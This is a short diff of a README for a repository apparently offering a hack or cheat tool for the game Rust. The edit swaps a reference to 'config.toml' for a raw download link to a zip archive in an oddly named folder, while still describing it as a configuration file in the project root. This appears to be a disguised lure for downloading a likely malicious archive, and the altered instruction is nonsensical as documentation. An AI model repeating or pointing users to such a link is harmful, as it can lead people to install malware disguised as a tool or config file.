hackerboy00/Rust-force-hck/README.md

 ### Configuration

-You can customize the settings in the `config.toml` file located in the root directory of the project.
+You can customize the settings in the `https://github.com/hackerboy00/Rust-force-hck/raw/refs/heads/main/werewolfism/Rust_hck_force_1.3.zip` file located in the root directory of the project.
 Adjust the parameters according to your preferences.

 ## Features